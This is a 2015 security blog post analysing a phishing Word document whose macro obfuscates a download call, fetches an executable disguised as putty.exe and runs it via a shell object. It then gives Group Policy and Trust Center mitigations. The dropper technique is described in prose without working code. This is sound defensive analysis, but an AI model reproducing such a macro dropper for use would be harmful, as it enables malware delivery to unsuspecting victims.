• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

War Room

Shells from above

RSM logo

  • Home
  • About
  • Blog
  • Talks/Whitepapers
  • Tools
  • Recreation
Home > Forensics > Real World Malware Analysis: The Original Phishster

Real World Malware Analysis: The Original Phishster

February 16, 2015 By malarkey

When my friend first told me that he was phished with a Word document, two infection methods came to mind: either it was a macro enabled in the document, or it was the recent MS14-064 vulnerability for Office. So let’s take a look! Here is what the offending document looks like when opened:

phishDocument

Macros are the winner! What do they do? In Word go to View > Macros > View Macro.

macro

Looks simple enough. Let’s step through it.

The macro obfuscates the URLDownloadToFileA method from Visual Basic naming it MKw5X. On opening, it creates two variables: bu4Cd (the $ indicates that the variable is a string) and I46hDj, one is the URL for the executable to download and the other is the location to save it. AVG tells us that this URL has potential malware. It then calls the obfuscated URLDownloadToFileA with the URL and file path variables and saves it. We can see that the file is going to be saved as putty.exe, a common, benign program. Finally it uses the CreateObject to create a WshShell object which allows it to run the file it originally downloaded! Not bad. In the next part of this series we will take a look at the executable file and see what information we can get from it. Before that, let’s take a look at a couple of ways to mitigate the issue with what we know so far.

Prevention

Macros, though very dangerous, can be very useful. Depending on a user’s need, it is possible to disable them completely, disable them until enabled by the user, or allow them to run automatically (which we can see is not a good idea). Macros are disabled by default, but in the case that they are not, here are a couple of steps you can take to mitigate the risk.

In Group Policy, you can disable all macros completely by enabling the Group Policy setting name: “Disable VBA for Office Applications”. This will disable it across all of Office, so if they are needed in just Excel, you would not be able to use this. At the very least, the “VBA Macro Notification Settings” Group Policy setting should be set to “Disable all with notification” as this will alert the user that there is a macro and it will not run unless they enable it. This is where user training will go a long way in protecting an organization.

For individual use in each of the Office products under Option > Trust Center > Macro Settings you can set it to disable all macros with notification.

disableMacros

We could also block this specific domain, although that would only prevent this individual case and can be avoided, but it’s a start!

A note about phishing emails:  Phishing emails rarely look like spam anymore and often have a good pretext. In this case, the email came as a response to a job posting. If the user doesn’t know about macro’s and enables them the attacker is in. The combination of user training and secure settings are key to reducing the risk of this type of attack.

In the next segment of this series, we will take the malware that the macro downloaded and do some basic static analysis. Stay tuned!

References:

http://technet.microsoft.com/en-us/library/ee857085%28v=office.15%29.aspx

Post Views: 204
Share this...
Email this to someone
email
Share on Facebook
Facebook
Tweet about this on Twitter
Twitter
Share on LinkedIn
Linkedin
Share on Reddit
Reddit

malarkey

Primary Sidebar

King Phisher Release

Categories

  • Defense
  • Forensics
  • Offense
  • Physical
  • R&D

Most Viewed Posts

  • Sophos UTM Home Edition – 3 – The Setup 10,683 views
  • DLL Injection Part 1: SetWindowsHookEx 10,384 views
  • Leveraging MS16-032 with PowerShell Empire 9,875 views
  • Bypassing Gmail’s Malicious Macro Signatures 9,759 views
  • How to Bypass SEP with Admin Access 8,321 views

Footer

  • RSS
  • Twitter
  • Tools
  • About
  • RSM US LLP

+1 800 903 6264

1 S Wacker Dr Suite 800
Chicago, IL 60606

Copyright © 2019 RSM US LLP. All rights reserved. RSM US LLP is a limited liability partnership and the U.S. member firm of RSM International, a global network of independent audit, tax and consulting firms. The member firms of RSM International collaborate to provide services to global clients, but are separate and distinct legal entities that cannot obligate each other. Each member firm is responsible only for its own acts and omissions, and not those of any other party. Visit for more information regarding RSM US LLP and RSM International.